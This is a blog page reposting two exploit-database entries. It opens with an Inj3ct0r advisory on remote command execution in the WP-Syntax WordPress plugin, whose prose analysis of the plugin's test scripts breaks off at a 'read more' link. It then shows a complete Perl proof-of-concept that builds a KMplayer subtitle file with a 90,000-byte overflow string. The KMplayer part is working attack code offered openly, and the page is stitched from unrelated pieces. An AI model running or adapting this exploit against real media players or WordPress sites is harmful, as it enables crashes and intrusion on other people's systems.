Chinadu's Blog

============================================================
Wordpress Plugin WP-Syntax < = 0.9.1 Remote Command Execution
============================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com

WP-Syntax - This is the most popular plugin for wordpress to highlight the code. It is used on many sites, such as Stefan Esser uses it on his blog. For me this plugin is of interest, as found in his blog quite a large farm-partnerki. Following an analysis of source code, I found quite unusual vulnerability, therefore, decided to create a separate topic. Probably somebody have comments or thoughts about a more elegant solution.

WP-Syntax uses the library GeSHi, which implements all the functionality to review the syntax and appropriate for each language html-code. Having reviewed the main script plugin wp-syntax.php, I moved to the folder test, where the 2 scripts: index.php and code.php. Code.php contains code examples for different languages, and leads them to the index.php illumination to demonstrate the capacity of the plug-in. Index.php inkludit wp-syntax.php, which in turn connects geshi.php. According to the developer wp-syntax.php can be called only in the context of WP, while the test / index.php can be run independently of the platform, the author decided to use samopalnoe WP likeness of a mechanism to implement the callback-function. Who is familiar with the internal device, WP, or at least see part of the code can understand what I am talking about functions add_action (), do_action (), apply_filters (), etc.
阅读全文...

#!usr/bin/perl
######################## In The Name Of Allah ####################
#
# The KMplayer (.Srt) File Local Bof Poc
#
#
#Author : b3hz4d (Seyed Behzad Shaghasemi)
#Site : Www.Pentesters.Ir
#Tested on KMplayer <= 2.9.4.1433
#Special Thanks : Navid, Hossein, Hooshang, Mahmood, Mohammad and all members in Pentesters.ir
#Greetings : Shahriyar && Alireza && Soroush and all iranian hackers
#
######################### Www.Pentesters.Ir ######################

$junk="A"x 90000;
open(fhandle,">SubTitle.srt");
print fhandle "1"."\n"."00:00:25,100 --> 00:00:30,900"."\n"."$junk\n"."-pentesters\n";
print fhandle "2"."\n"."00:00:31,100 --> 00:00:35,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "3"."\n"."00:00:36,100 --> 00:00:40,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "4"."\n"."00:00:41,100 --> 00:00:45,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "5"."\n"."00:00:46,100 --> 00:00:50,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "6"."\n"."00:00:51,100 --> 00:00:55,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
close(fhandle);

# milw0rm.com [2009-07-20]